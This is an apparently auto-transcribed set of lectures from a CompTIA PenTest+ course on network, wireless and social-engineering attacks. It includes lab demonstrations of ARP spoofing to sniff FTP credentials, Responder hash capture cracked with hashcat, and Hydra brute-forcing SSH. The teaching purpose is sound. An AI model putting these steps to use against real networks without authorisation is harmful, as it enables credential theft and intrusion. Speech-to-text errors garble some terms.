protocols that Microsoft use um to share files and we're also going to assist going to see some other protocols such as SNMP SMTP DNS SSH now we also have the main in the middle attack which is also referenced as mitm so it stands for men in the middle attack this is and we're going to see some types of men in the middle attacks but these are attacks where the attacker you as a pen tester in this case is in between a conversation so there is a source in a destination and you somehow manage to intercept

that conversation you get in the middle of that transmission and while there are different techniques to do this and different goals that may be achieved by doing it you also have the traditional deny of service attacks or the also the distributed deny of service attack this is a more I would say that the way that it's executed tends to be more simplistic there is no fancy technique here basically what you're trying to achieve is okay there is a service running or a a device and I want to bring it down I I want to shut

it down for example or make the service unavailable so it's a denial of service and usually this is done this is achieved by exploiting a protocol or softer flaw the reason why I said that it doesn't involve too many techniques or at least not fancy techniques is because since you're relying um on some flaws basically you just have to exploit that flaw that is built in the code or in the device you can also attack security features resources or tools uh indeed so for example you can try to bypass a firewall you can try to

bypass an intrusion detection system you can try to bypass a neck so there are different ways of doing it and once again the focus here is to either attack make unavailable or simply bypass any type of security feature that your target Network may have okay now going into more details in regards to the types of exploits that we have to exploit those Network vulnerabilities so first of all one that is much more low level it's very common it actually that's what people use nowadays so in local area networks what we have is what we see

is the use of switching devices switches so it's very common to see switches where you can deploy you as a network analyst for example you can deploy vlans now many of those switches they support tagged or untagged ports that's the 802.1q protocol that allows you to Define some additional features to specific ports so you can say for example that if you have a switch composed of 24 ports you can say that I don't know 12 ports belong to a specific villain and the other 12 ports belong to another villain but let's say that out of

those 24 ports you have a trunk Port that will also support both vlans so there is a trunk port a port that will be used to connect to another switch which also supports 802.1 Q that's going to be a trunk Port so you want to make sure that part talks both vlans knows the existence of both vlans also because you want to be able to communicate allow that switch to communicate with the devices that are linked to that other stacked switch so there is a requirement of capabilities here you have to make sure that both

switches in case they know different vlans they also know that the there are other villains assigned to the to the computers connected to the other switch so it's one implementation that can guarantee that different computers will be separated they will only communicate with the other computers that you actually want them to communicate but at the same time you want to guarantee that if computers connected to the other switch belong to villain let's say a those computers will be able to communicate with other computers connected to the first switch also belonging to VLAN a so you

need those trunk boards or uplinks now that's why you need the dot one queue protocol support now what is the switch spoofing switch spoofing are types of attacks where you can fake that your machine actually belong to that specific villain and even more you can make your machine work as a switch itself supporting those vlans actually it's not that difficult to deploy this type of attack because for example if you're if you have a Linux machine in a Linux machine you can actually just say okay my interface will support this protocol you can just load

that module and then specify you can create a villain interfaces virtual interfaces and say Okay so this interface here belongs to this villain the other interface belongs to the other villain and you can even tag those interfaces which means that your machine will be behave as a switch another very famous protocol famous due to its importance usage and also to its security limitations security problems that's the domain name system protocol DNS two very common types of attacks DNS spoofing so DNS spoofing is an attack where you fake you capture a request that is being sent

by a DNS server and you actually tell that DNS server that a specific name is assigned um to a specific IP but that IP is an IP that you have control of and it it can be a server that you as an attacker control and you're faking a website so let's take a look at an example let's say that your client uh your clients company has I don't know many employees one of those employees want to access google.com so okay he he opens that person opens the browser and types www.google.com what's going to happen it

will request to the company's domain name system server the DNS server hey can you please resolve this name google.com if that DNS server knows the IP address assigned to that name it will just reply to that client in case the DNS Server doesn't know it it will perform what is called a recursive name resolution and that's where the DNS spoofing attack comes in um in in this type of attack the attacker will manage to say that when a recursive attack happens that DNS server will go to what is called the root DNS servers to initiate

that resolution if the attacker is capable of Faking saying that it is a root server or a specific server to a specific domain then it can simply say hey google.com is assigned to this IP address which is not the the IP address of a Google web server it's another server somewhere sitting somewhere but it also runs a web server hosting a web page that is a copy that presents a copy of a Google web page so at the end the client will be redirected the target will be redirected to that website that is not the

actual Google website obviously this became very difficult to perform due to the Improvement in security of the DNS protocol well not DNS protocol itself but the usage of DNS with DNS sac and also because of certifications so performing this type of attack focusing on websites became very very difficult due to certificates but you can also focus on another attack which is tampering files or changing files resolutions name resolutions are not always performed based on domain name DNS servers actually before a machine asks for a DNS server to resolve a name it will try to locally

perform that resolution based on a local database Linux and Windows systems they rely on the hosts file obviously they we reside in different locations when talking about these two different operating systems but it's the same file with the same content what does that file have what does it present basically it presents a name and nip it Associates a name with an IP in a text file if you're capable of accessing that machine as an administrator then you can change that file and say hey google.com is assigned to this IP address here you can also do

the same thing if you get access to the company's DNS server so if you can control that server you can just just go there and say hey DNS server now this IP address here is us at this name here is assigned to this IP address don't perform a recursive search rely on this file that you have here and respond to your clients based on this information that you have right here men in the mirror attacks well first of all a very common man in the mirror attack is ARP spoofing Arch spoofing relies on the way

that well basically that's how TCP IP based the networks which is everywhere any network relies on the ARP protocol before actually using IP and any other protocol so while you do have to understand the ARP protocol but basically what it does is before in order to establish a communication you have to uh translate an IP address into a MAC address basically what happens is your machine will ask hey I want to communicate with this IP address who has it the machine that has that IP address will reply to you saying hey I have it and

this is my Mac address in a ARP spoofing attack a man in the middle will intercept that communication and say hey this is my IP address right here and this is my Mac but it's not it's forging faking that Mac address another attack that will actually deploy in a following video is a replay attack replay attacks are based on the idea of intercept and once again where it intercepting a traffic but in a replay attack we're using that packet that's been intercepting to later on in another opportunity send it again you may change that information

or not usually you do that is actually one of the biggest differences between a replay attack and a relay attack um a in a replay attack many times you want to change the information at least some of the information that is contained in a in a packet but it's also very important to realize that it's supposed to be used in a another moment whereas a relay attack will many times well will actually not involve changing the information but simply relaying that packet that's being intercepted so a situation where you can see a relay attack is

okay so one example let's say that you you want to open a garage door of a residence okay that's not your residence what you can actually do is to fake a request to the device the device card that is actually capable of opening that gate so for example you can send you can come up with a device that will be able to request a remote controller to send the information the signal that is required to open that that gate well but the that device doesn't actually want to open the gate but you do want to

capture that response and without modifying it just forward it to the device that is attached to the uh garage door and then open that garage door now this is just an illustration that is not how garage doors work it's different but just to give you in a scenario where you can visualize this happening okay it's a situation where where without the the device requesting a response an authentication from the client you force that client to send that authentication the credentials and then you can just forward those credentials credentials to do something regarding SSL you've you

have SSL stripping that's where you are actually removing the SSL security so when it comes to Sr sales we tend to focus on HTTP and https protocols because that's basically the difference between HTTP and https so https is the HTTP protocol along with the SSL now when the way that you try to implement this type of attack is you may remember that sometimes you enter a um a URL in your browser and you are not specifying https okay so your browser by default it uses HTTP so if if you open it and you you type

gmail.com you're actually trying to connect to Port 80 HTTP using the HTTP protocol connecting to Port 80 of the Gmail web server okay but if the Gmail web server deploys https if it's HTTP plus SSL you as a client will be redirected to Port 443 which is the https Port okay nothing unusual that's how it happens but when you are deploying an attacker is deploying the SSL stripping attack what it's trying to do is it's monitoring traffic trying to see or analyze all the HTTP requests being sent by clients once that HTTP request is sent

the HTTP s server will respond with a redirection hey you are not supposed to connect to Port H Port 80 you're supposed to use https Port 443 what the attacker is going to do when intercepting that communication is hey https server or the server that actually hosts that web page I am the client so the client had its uh communication its packets intercepted by you the attacker you behave as a client you fake that you're the one that is actually requesting that SSL connection so the https server will respond to you and communicate with you

using a encrypted communication understanding that you're the client you are forwarding the response set by that https server to the actual client which is the target but using HTTP not https so what's going on there you as a as an attacker is receiving all information coming from that Target using the HTTP protocol without encryption which means that you can read all the information and then you just encrypt that using SSL well it's not just encryption but you use SSL to generate the same information the same HTTP information but using https at this moment it's a

bit different actually it's a lot different when you perform the SSL downgrading attack this relies on the possibility of downgrading the SSL or TLS version so when the client performs the request once again you intercept that communication but what you're going to do is to actually say respond to that client saying hey I do not support this SSL or TLS version that you're requesting can we downgrade to another version if the client supports that then the client will say okay we can use another version another version which has flaws and then that communication continues but

then the communication is being performed using a um a non-secure or at least not that secure layer which means that the attacker can try to break in break the information um retrieve the information that is mean encrypted you can also try to bypass network access control Solutions so it's very common to see nowadays networks using any type of neck okay so just a summary anac is a solution not just a single device usually but an entire solution that will control the nodes that are trying to access the Lan the network so there are different types

of authentication performed by a neck server for example the client would have to have a client software informing credentials username and password only if those credentials are valid that client will get access to the network that's that's one example but there is one another example that is also used as amazing as it is it's still implemented it's still common and it can be easily uh bypassed which is a neck a Mac based neck what does that mean it's a neck that will verify if that Mac address the source Mac address is in the list of

accepted clients if it is then the client will be by will get access to the network well there is a very simple tool in a Linux environment especially in Kali Linux called Mac changer it's a Command MAC changer you can use Mac changer to Simply say hey my Mac is this one obviously you have to some somehow know a MAC address that is allowed to bypass the to authenticate in that neck which is not hard to do because if you can capture traffic using a sniff you can see many Mac addresses flowing and you can

try some of those ones now it's common to see vulnerabilities coming up every day and finding vulnerabilities associated with protocols specifically with protocols and that is just another reason why it's important to keep following updates on regards to new vulnerabilities therefore there are some protocols that are known due to the number of vulnerabilities that are coming up associated with them so a few more protocols here simple meal transfer protocol or simply SMTP that's a protocol used when transmitting emails sending emails and although nowadays most SMTP servers they rely on the usage of encryption by using

implementing certificates it's it's also common to see some servers that still Implement plain task text SMTP now it's not very common to see flaws associated with the protocol itself but there are ways of getting a hold of very useful information so for example if you find a SMTP server you can connect to that server and try to enumerate accounts so you can try to connect and say hey I want to see if this email account exists if this user exists I want to see if this list of accounts exist um and it's actually very simple

to do another one that is very resourceful very powerful is the simple Network management protocol snnp it's a protocol used to manage Networks by using this protocol you can not only get a hold of any kind of information in your entire network information is specific to a specific device but you can also change many of the that of those informations so for example you can remotely say hey that device has that IP address but I want to change it I'm going to change its IP address to whatever so it's that powerful so you can see

how important and critical this protocol is now the problem is the diversions that are common are versions one 2 and 2C most likely snnp version 2C what is the problem with those versions first of all its authentication system is based on a username only which is called Community it's not called username okay they use this nomenclature community so there is no password it's just the community name and if you can figure out what the community name is there's a bunch of stuff that you can do obviously you have different communities and their capabilities but basically

a community can be read only or read write if you um find out a read-only community you'll be able to see gather a bunch of information if you get a hold of a read write Community name you'll not only be able to see information but also to change information in a network and then you have the SNP version 3 which is the secure version it uses credentials username and password and also it has an encryption system we so that's the best solution the problem is it's still very common to see snnp v2c actually only newer

devices support snmpv3 so that is one reason why you see so many networks still using SNP v2c that's because many of those devices there do not support V3 file transfer protocol so FTP is a plain text protocol we do have the SFTP which is FTP over SSH which uses encryption but the file transfer protocol does not support it and we are actually going to see how we can leverage a flaw here and we also have the Linux implementation of the SMB protocol the service message block created by Microsoft that's December implementation now I'm not going

to talk much about it because we will actually in a following video discuss the net buyers and its protocols which include the SMB protocol and we also have the secure shell yes secure shell SSH is a fairly secure product Protocol remote access protocol but obviously first of all it depends on the version if you find a server that is running a very old version of the SSH protocol there will be exploits available to that but also you can always try to Brute Force passwords against the SSH server and we will actually see a tool called

Hydra that will help us doing that so in this first video I wanted to present some Network vulnerabilities how you can exploit Network vulnerabilities what are the options and we also discussed some protocol uh protocols actually that have some known flaws that can be exploited in you as an a pen tester should look into whenever you see that those Protocols are available in a client's Network I hope you enjoyed this video thank you very much hello this is our second video of module 7 and the reason why we're analyzing we're going to analyze this protocol

is study this protocol or at least well not specifically a protocol but a suite of protocols is because it's so important in regards to pen testing it's so important that the CompTIA pen Test Plus exam actually will present to you not just one or two but many questions associated with the problems that um analysts will have to face when using Windows systems and this is a suite of protocols that are embedded in Windows systems okay so that's why we have to take a better look at it before we actually understand the flaws or how to

exploit these flaws we have to understand the protocol okay so first of all what is the net bias Suite so netbias is a suite that will out of the services that it presents Mo the most important one probably is the net bias name service or ndns basically it's the implementation of this service so in a summary the net bias product protocol was created to allow Windows operating systems to communicate among themselves it could be just to share files share printers or only to see if they are in the network find other Windows systems in that

same local network so basically the idea is to use some kind of DNS protocol but a DNS protocol does that is controlled by the Windows systems inside a local network a a a a Windows local network now leveraging leveraging that we could also share resources such as files and printers scanners whatever it is okay so there are some main ports associated with the net bias solution and it will vary depending on your on the Windows operating system on the version of the Windows operating system so for example up to Windows 2008 if it's a server

and up to Windows Windows 7 if it's a desktop environment they would use particip 135 to perform Microsoft Remote procedure calls newer Windows operating systems don't use this port anymore but all of them they use 137 138 and 139 so part 137 is the net buyer's name service so that is the port that is using used to resolve names we're going to see in the next slide how Windows systems communicate with other Windows systems in a lan it's based on the net bios name and basically it relies on broadcasting or in a Windows name server

a local Windows name server so that is performed using this port 137 now to transmit data um the that session that communication must be controlled by a service that service can be 138 UDP in case its datagram based so transmission using that are not session controlled they're not object oriented they use UDP on Port 138 if it's a session service it uses 139 TCP not UDP and also you have the SMB the using Port 445 TCP that's actually the port that is used to transfer files or share resources now how does the naming service Works

in Windows environments based on the net bias Suite of protocols well basically a Target so let's say a source not precisely a target a source will let's say that you want you are using controlling that Source you're controlling that Target that device if you go to the windows Network you want to you open your Windows Explorer and you want to see the other computers that belong to the same network that in which you were inserted in you want to see your windows neighbors so you go to my network and you click there what you want

to do is see the other Windows systems okay basically what your machine is going to do is it will say hey who's here okay if it if it's a generic question like I just want to see all the systems that are here your machine will ask a domain um Master browser that exists in that Network that Master browser will answer to you or send to you a list hey this is the list of nodes Windows nodes that we have here okay nice however if you already have that list so you go to my networks and

you see all those windows machines there and you want to access a a specific machine so there is machine XYZ and you double click it well that means that you want to actually access resources of that that machine but before you can actually access that machine you have to know that machine that machines IP address what you're going to do is you broadcast this question hey who is XYZ then the attacker will say hey here I am I am XYZ it will inform its IP address so the target will say oh okay so I want

to access a few resources that you have but to do that I have to authenticate so I want to authenticate and that's how the the net bias protocol works the the machine that is supposed to receive that connection that request will send a challenge so in this case that's the attacker so the attacker which is acting as just a regular machine will say well okay so to do that you have to answer a challenge now here's the catch the software is that you could use in order to perform this type of attack such as responder

what it's going to do is it will always send the same challenge which means that the target will send an encrypted challenge response well not encrypted actually hashed so it will send a hashed challenge response but again it's it will always be the same response because the challenge was the same the challenge that was sent is the same every time so a software such as responder will know that the the hash that it will receive will correspond to a specific challenge now that it has the hash that software can then use that hash you can

use another software to try to crack that hash now it's not to decrypt it's a hash it cannot be decrypt but we're gonna see how it actually occurs so basically the way it's going to do is it will compare that hash with a database of hashes that it has similar to a rainbow table and once it it matches that that that hash it will know oh okay so this hash matches this other hash that I have in my database and according to my database this hash corresponds to display text password and then the the attacker

will know the password and we are actually going to implement this type of attack now that is one way of performing an attack using a software that will help you capture the hash and then use another one to crack that hash but there is another type of attack that you can perform and actually responder will allow you to do that as well so what else can you do once you have the hash you can perform a past the hash attack it's an attack that will replay that hash and then authenticate to that other other machine

getting access to it again we are going to see how to do this capturing the password the user and the password so we are going to crack it but we could very well use responder itself to perform a pass the hash attack so in this video we learned more about the net bios protocol the net bias Suite of protocols that Microsoft implements we discussed how it works and also a couple of ways of actually leveraging this this protocol that has some known vulnerabilities I hope you enjoyed this video thank you very much hello welcome to

module 7. this is our third video and in this this is going to be actually a very short video but we just need to talk a little bit about wireless networks most of the times when you're studying pen testing or hacking or security you've TR you tend to focus on wired networks and there is a very good explanation for that the reason being is when you are performing these high level tasks high level activities you are actually focusing on uh companies not in residential Solutions but Enterprise Solutions and although companies do use wireless networks their

core is not composed of wired wireless devices but wired devices but still we have to keep in mind that the any type of pen testing or attacking tasks hacking tasks they must must initiate by gathering information so acquiring information that is being transmitted from or to desktop devices is also very important which means that even though wireless networks are not the best Solutions in regards to Performance they are still around they are very much used by the end users actually it keeps growing and growing nowadays it's even hard to see desktops plugged into at least

laptops plugged into the wired Network and obviously because the CompTIA pentas plus exam requires us to know some security features and Pen testing resources that you have available in regards to wireless networks now observe that I'm not mentioning Wi-Fi by networks I'm generalizing as wireless networks so let's start with the most traditional standard that we have which is the wireless fidelity Wi-Fi there are different types of attacks that you can perform against Wi-Fi networks but let's just mention a couple here that are very common so one is called evil twins so evil twins is also

known as cloning Wi-Fi cloning basically what you do here is you bring a access point which can actually be your own laptop as long as you have a system such as Linux running in it and you can install some tools some pen testing tools you could for example run kala Linux which has a software called Kismet that would help help you to do this which is fake your machine and make it behave as an access point and what you obviously you can also bring your access point to the network you could do that but then

what you would have to do is you'd have to configure your access point to broadcast a network with the same name with the same BSS ID that the other um actual Wireless Wi-Fi network that is in that Network so let's say that you are in a premises that the Wi-Fi network is called company ABC okay what would you have to do you just you just have to configure your access point with that BSS ID well actually SSID and BSS ID so you'd have to clone the information that belongs to the machine to the access point

that already exists there would be the first step obviously but wait that's not enough if you do that what's going to happen is there will be two access points with the same network name which is okay it exists that's perfectly fine but the problem is if you do that you can still have the laptops for example the clients still connecting to the original access point not to your own access point so what can you do then you can send a d authentication signal to those clients the clients would just accept it because it's coming from

the access point that what they believe to be the access point that actually broadcast um the the the wireless connection so they would be de-authenticated and then they would have to authenticate again at this moment depending on where you located your placed your access point some devices would connect to your device and you then start capturing the traffic that is being sent by those clients um another problem that we have in Wi-Fi networks is their key the the security the level of security used by their keys nowadays it's not that common to see networks Wi-Fi

networks implementing web neither WPA it's very common to see WPA2 but they are still around mostly WPA up with a pre-shared key not Enterprise WPA so the the problem with that is well if you find a network that uses a web type of key that's very easy to crack you can simply use the aircraft NG Suite which is a suite it's not just a single software it's a suite of softwares but if you use uh if you find it then it would be easily cracked if you you have find a network that uses WPA pre-shared

key it's still crackable but it's not that easy it's gonna take a very long time for sure and you need a lot of traffic going on in that Network you're gonna have to capture packets you're gonna have to replay packets um and you're gonna have to work in a environment that you know not only be collecting beacons collecting authentication packets but you have to replay that to force um the theory three-way handshake in a very large number of opportunities then you can try to crack that key crack that password now moving to Bluetooth the CompTIA

pen Test Plus exam also requires you to know some vulnerabilities or attacks in a Bluetooth network wireless network and the most common ones are blue snarfing and blue Jack and blue snarfing is you can use in a device that supports the Bluetooth protocol you can gather you can retrieve the contact list of another device of another Bluetooth device that has bluetooth enabled obviously and that is open to everybody so you can remotely grab their contact list and another one is bluejacking bluejacking is a way of hijacking a Bluetooth session and in regard regards to afid

we have the most common ones are cloning jamming and repeating which are very self-explanatory so cloning is similar to evil twins you and it's actually very common nowadays you can for example let's say that you go shopping and you need a new wallet and you find a wallet that it says that it's um rifid cloning protected that means that they that that wallet implements at some level a security that will prevent from another from a device from cloning your RFID signal jamming is when you use signals to jam a RFID connection or I ifid communication

and repeating is MP type of attack in which you are going to repeat a signal that you managed to acquire previously so let's say that you somehow managed to grab you detected a RFID signal coming from a specific RFID device you grab that signal and you copy it later on you repeat that signal you emit that signal once again in order to authenticate with the other RFID controlling authentication device so basically the these are the most important Concepts and vulnerabilities that you have to know for the CompTIA pen test exam them in regards to tools

the two tools that you have to be aware of are the air crack NG and Kismet so aircraft NG is actually a suite of softwares as I mentioned um if you have the opportunity you should try to use it so basically some tools that you have there are air mon which is a tool that will allow you to configure your interface in the monitoring mode that's the mode that your interface must be configured in in order to be able to capture traffic you'll also have Aero dump which is going to be the the tool that

will actually capture the traffic so first you have to configure in a promiscuous mode or a monitoring mode then you have to actually grab sniff the packets you also have every play which is used to replay the traffic that you that your interface captures and you also have the air crack that we will try to crack the the password of that Network so I hope you enjoyed this video um it's very important that you go through some Concepts about wireless networks to get ready for the contia pen Test Plus exam thank you very much hello

welcome to video 4 of module 7 and this video will be will be focused on tools it will be a Hands-On video we are actually going to analyze a few tools those tools are responder and we're going to combine responder with with hashcap the reason why we're going to do that is because we will use responder to capture that hash sent by a Windows machine using the netbias protocol once we have that hash we're gonna pass it over hand it over to hashcad in order to try to crack that password so that's going to be

one tool another tool that will also use is going to be ARP spoof actually we're going to to see ARP spoof first the idea here will be to show how you can art spoof a device in order to capture the traffic that it's transmitting and we'll combine that with the FTP protocol so we're going to perform a FTP access from a a original Windows 2008 machine and we'll see that the Kali Linux machine will be able to capture Implement Arc spoof and capture that traffic we're actually going to see the username and password because like

we've learned before the FTP protocol does not use encryption and then we'll we'll get to know a tool called Hydra and Hydra is a cracking tool it will help you perform Brute Force attacks so it combines uh credentials usernames and passwords in order to crack um that that service in order to get access to a specific service we are going to use Hydra with SSH so we'll try to SSH crack the password of a SSH server so let's start off with Arps both so the scenario that I have here is this my cataly Linux machine

has this IP address right here 192.168.0.20 and we can also see that my router is 192.168.0.1 now let's go to my target machine which is this Windows 2008 server here the same one that is running met exploitable actually it is an instance of metal exploitable um so this machine has IP address 192.168.0.22 and we can also see that the Gateway is the same one 192 168.0.1 so let's just picture a scenario here imagine that this is a machine a desktop and this one right here is a machine that I was able to insert into that

Network so obviously I am using a Kala Linux machine it could be my own laptop because I managed somehow to get physical access to it or you or it could be just another desktop that I managed to get access to it to control it for example using the reverse TCP attack that we saw in the previous module so um the way that we can do this is well first of all you have to make sure that you have this software here installed in a Linux system right d s a d sniff so you needed this

sniff in order to run art spoof that's because ARP spoof comes in that packet so make sure you have it installed first then it's pretty simple actually you can simply do ARP spoof Dash I and interface which will capture traffic and also implement the ARP spoof attack so what is the scenario here my target which I will identify with the dash T switch is 192. 168.022 that's my Windows machine that's my target I want to capture traffic that is being sent to and sent from that machine when it communicates with 192.168.0.1 which is my router

so what is actually going on here what is happening here what I'm saying is whenever machine 192.168.0.22 asks for IP address 192.168.0.1 how I will reply to that Target machine which is 22 the client the windows client saying hey I have IP address dot 0.1 I am your gateway and here is my Mac address that's because in a local area network the communication is established via data link protocol so Mac address is used not IP addresses so the IP addresses are converted into Mac addresses okay so I am going to run it there it is

it is ARP spoofing now that's not enough when I do this I'm simply saying hey if that client asks for this IP address I will reply with this Mac here I will say that I am the IP address and I have this Mac right here okay good now I also need another tool I need Wireshark to capture traffic I need a sniffer so what I am going to do here is run Wireshark and there we are we need the administrator password to run it as root okay there I am going to start capturing traffic but

it's gonna give us a bunch of information which I don't want I just want to see FTP traffic so what I'm going to do here is to implement a filter TCP because I want to specify Port that's going to be my filter Port part 21 that's the FTP Port well since I'm specifying Port I have to either use TCP or the UDP protocol I know that part 21 uh at least the authentication process occurs via part 21 TCP so TCP dot Port equals 21 right there okay so Wireshark is capturing a bunch of stuff but

I'm I don't care I just want to see the traffic associated with Port 21. okay good now I'm gonna go there to my client machine and I will just pick a random FTP and one that I know from the top of my head I'm not going to hack it so there is no problem to do it here I'm just accessing a FTP server I don't have the credentials nothing wrong here I am gonna do this for example I know that this is a FTP server and just a simple search on the web will give you

this okay and there in the back right there you can see that there is a lot of FTP many FTP packets flowing being captured now FTP the FTP server will ask for my credentials please inform me a password I'm gonna say my user oh you could see that it showed something captured something else back there now it's asking for the password I'm gonna say my pass okay now this is not uh a valid and this is not valid credentials as you can see right here login failed that's perfectly fine I don't want to authenticate I

just want to show you that we're simulating this is a client okay a valid legit client and I am performing a capture here I am actually going to stop that capture as an attacker and let's see let's take a look at the FTP packets let me go up here let me start over here okay so it's requesting and let me open the FTP header header right here there it is so first it asked for my username and then I informed that username right here so pass my pass that's the password that I informed we also

have the user which is somewhere up here probably here let's see um no so that's the hello oh there you go so user my user let's go down a little bit it requires the password so I will inform that password pass my pass as I informed there a very simplistic way of capturing traffic that is not encrypted that is how you can Implement arcspoof and also take a look at the packets the content of the packets that are being transmitted if they're not encrypted I am now going to close this and let's take a look

at another attack I'm going to close this as well now the attack we're going to analyze the attack we're going to look into now is an attack against the way that the window that window systems actually communicate with other Windows systems using the net bios plot protocol so you may remember that with the Windows machine will send uh whenever a Windows machine wants to access resources of another Windows machine it will Say Hey I want to access some resources that you have but to do that I needed to authenticate so you need to send me

a challenge when you send me the challenge I will reply to that challenge ideally and theoretically since only the two of us know that challenge I will be the one to answer that challenge to you ideally but let's see that it's not quite how it happens what I am going to do here I am going to run responder and one way of running responder is using these switches here w f r so that is a way that you can run responder in a automated way it will automatically respond to any net buyers search request that

happens in the request that happens it will say hey here I am I am that guide I am that Windows machines that machine that you are trying to access and here's the challenge okay answer my challenge give me your hash and then you'll be able to access my resource if you answered that chat a challenge properly okay very good you also have to specify the interface in which you'll be listening to the netbias packets so I'm using the dash capital I eth0 that's my interface I am going to run it and you're gonna see here

if I scroll up um you're gonna see hey this is responder this is what I am running so I'm running these poisoners for these protocols I'm running these servers HTTP https servers wpad server SMB server all these stuff that I am running and this is my information eth0 that is my IP address the challenge is set to random it's a random value okay oh there you go so we already have some net bias information uh flowing and we can see here that responder poisoned answer sent to that IP address right there 192.168.0.12. okay but that's

not what I actually want because what I want is I am now going gonna come to this machine right here and let's just say that this client here okay this Windows 2008 server once you access that want to access that share which actually wants to map that shared folder TMP that's the shared folder belong which belongs to the any win machine and I want to map it to the f Drive to do that I want to I need to authenticate well you could inform a guest or you can actually send a valid username and password

so let's assume that in this scenario what I actually want to capture is I want to see if there is any machine trying to access another machine and that shared folder that resource that is being accessed requires credentials I want to capture credentials okay so I when I say I it's me as a an attacker here in my calendar Linux machine and now I just want to perform a legit axis as a client as a Windows client okay to access this resource which probably could be a valid resource okay so let's just assume that the

any win machine do exist in the network it does share a folder called TMP and the username is user1 and the password is pass okay I'm gonna run it and there we go it shows to me as access is denied and well as a client I may look at it and say Hey did I inform anything wrong here what's going on probably the user will not suspect that this is an actual attack something just happened in the network maybe that folder is not shared anymore maybe that's user is not valid anymore whatever it is I

now as an attacker have this information right here so let's take a look at that information so hey there is a um I'm poisoning so poisoned answer sent to 192.168.0.22 for a name any win so that client was trying to access this machine here any win and that client is this machine um and it's informing user one as its user and the password is actually right here but it's a hash right I can't read it but what I can do is copy this information right here I will copy selection okay I am going to just

finish this I am going to edit this file here and paste selection and save it okay so I just created a random file called hash.txt and I pasted that hash in there what I'm going to do now is to run oops is to run my hashcad tool now how to use the hashcap tool you use hashcat Dash m m specifies the the hash algorithm so each hash algorithm has a specific identifier in case of a LM Windows LM hash it's identified by this code 5600 then I inform the file that has my hash which is

hash.txt and then I inform my database my rainbow table the file that has names usernames and passwords associated with hashes okay I run it and it can take a while it can be quick let's see what happens here well actually it scrolled all the way down which does not give me too much at least useful information but something that is very interesting here is the status cracked well if it's been cracked where is that password I am going to scroll up here and up here it's showing me oops it's showing me the username the hash

and at the end there it is the password is pass as I informed right here so that is how you can crack this type of um of hash a net bias hash now we will also take a look at another type of attack which is a Brute Force attack for SSH connections SSH servers to do that we are going to use a software called Hydra I recommend you that you take a look at its help page and here you can actually see an example and basically that's all that you need obviously you can do work

with some additional options here but but that is actually what you need the only thing that I would recommend you to add here is the dash T option which determines the number of concurrent processes that will run so it will make it faster um but basically that's what you do you do Hydra in case you want to try to crack a password of a specific user you use the dash L option so Dash L and the username and then obviously you want to have a possible passwords database a database of passwords which must be a

text file okay and you're actually going to see that Kali Linux already comes with a bunch of those so I use the dash capital P option and then that password list file and then you want to well if you want to specify the dash T option with the number of processes you can and then you specify the protocol and then the target machine so as you can see you can use Hydra to try to crack a password for different Services different protocols here in this example we see FTP the only difference is that we are

going to run it against a SSH server now obviously to make sure that it works I have to be certain that the SSH service is running in that Target machine in this case my the same machine the same color Linux machine is my target I am going to try to hack the Hacked user so I created that user and I defined its password as one two three four five six so that's the password and here is a very large list file with a list of possible passwords you can find others in this directory so if

I oops so let me cancel here if I list the content of that directory we are going to see a few now observe that I actually have directories here aside from rocky.txt we have other directories and we have other lists inside those directories so many files there okay so that is what I am going to do and since it's a very simple password obviously it goes at the top of the list at the rocky.txt list so there it is okay let's see what it says it says that it is uh please do not use in

military or Secret Service organizations or for illegal purposes um so a Max of four tasks four processes per one server which means that we have an overall of four uh simultaneous tasks we are attacking the SSH server localhost Port 22. okay so here is a summary part 22 that's the host the login that you asked me to try to crack is hacked and there you go I was able to crack it when I tried to access it with the Hacked user and informing password one two three four five six it worked so the result is

one of one target successfully completed one valid password found so that's the result that's how you can use a Brute Force tool in order to crack passwords so in this video we learned we actually saw how to work with responder we saw how we can ARB spoof a Target and then capture traffic that is being sent to and from that specific Target and we also saw how we can Brute Force services I hope you enjoyed this video thank you very much hello guys welcome to module 8 and our topic in this module is going to

be social engineering more specifically understanding most at least the most important or most used social engineering attacks so first of all we have to understand what social engineering is and it's actually a pretty simple concept the idea of social engineering which in regards to hacking it started with Kevin mitnick so Kevin mitnick was a wizard of the hacking world and according to himself one of the reasons why he was so successful was because he understood that hacking is not just about technical abilities but also the social abilities you have to understand people and most of

all you have to make people trust you that will help you gather information that is going to be very important when it comes to the point that you are actually going to use the tools that you're willing to use so basically social engineering is the usage of techniques that will allow you to gather information but you were able to gather that information you collected that information from human resources from other human beings for example employees that works for that work for that specific company that you're targeting now let's talk about some of the most important

social engineering attacks and we can see this picture here of someone jumping into a trash can which is known as dumpster diving and dumpster diving is exactly that it's when you as an attacker or or as a pen tester will try to find information in a trash can for example or in a dumpster so it's very common to see people instead of shredding papers they just throw the paper away so that is one way that you can find information because many situations some papers that are thrown away they have information that at least doesn't look

important to the employee but it is important to you as a pen tester for example let's say that there is an invoice and that invoice shows information such as who is responsible for purchasing products to the company also it may show some information about what the company has purchased let's say that it's a new device such as a new server well if a new server is being purchased there is a very high probability that there is a point of contact from the the the company that is selling that service that server with your client which

means that you can then make use of that to perform another social engineering Tech such as impersonation which we'll talk about shoulder surfing and very common to see this type of attack that's when someone goes to the ATM and it that person is typing the pin number and there is an attacker trying to see over that person's shoulder so it's trying to see what the person is typing to retrieve that PIN number same thing for keyboards so try to see someone typing the the password lock picking and this is a common type of attack it's

more associated with a physical attack more than social engineering but there are it involves social engineering as well for example if you're simply lock picking so you have a master key that you will try to use to open a door and enter the company the company's premises okay that's just the old traditional lock picking but as you probably as you've probably seen in movies or TV shows when an attacker is uh faking that that person is taking pictures for example or uh filming a scenario right but actually that person is using the camera to try

to take a photo of someone uh of someone's uh card someone's personal card and that personal card may have information to be that could be used for example if it's the personal ID that tag with that person's name Company ID photo the the attacker May Forge may may make a copy of that um we also have lock picking in regards to RFID cards so you may use a device that will copy the signal that is issued by someone's RFID Card you can then manufacture your own RFID Card with that same signal with that same ID

eavesdropping is also very very common and something that we always see in the movies very effective that's when you try to get close to someone that works for the company so you get close to an employee or close enough to the I don't know to a director and you try to listen to that person's conversation or those people talking you can try to fetch retrieve information out of that conversation that is eavesdropping persuasion or elicitation that's when you try to persuade someone that probably has information to tell you part or most maybe even the entire

information that you're looking for so for example you as an attacker you try to make it casual you are talking to someone that works for that company and then you start just chit chatting until you get into the point that will allow you to gather information that may be used for example you start chit chatting and then you say you you start talking about the company also it's such a nice company uh but I I didn't really know that this company was so large you had so many employees so you're trying to make that person

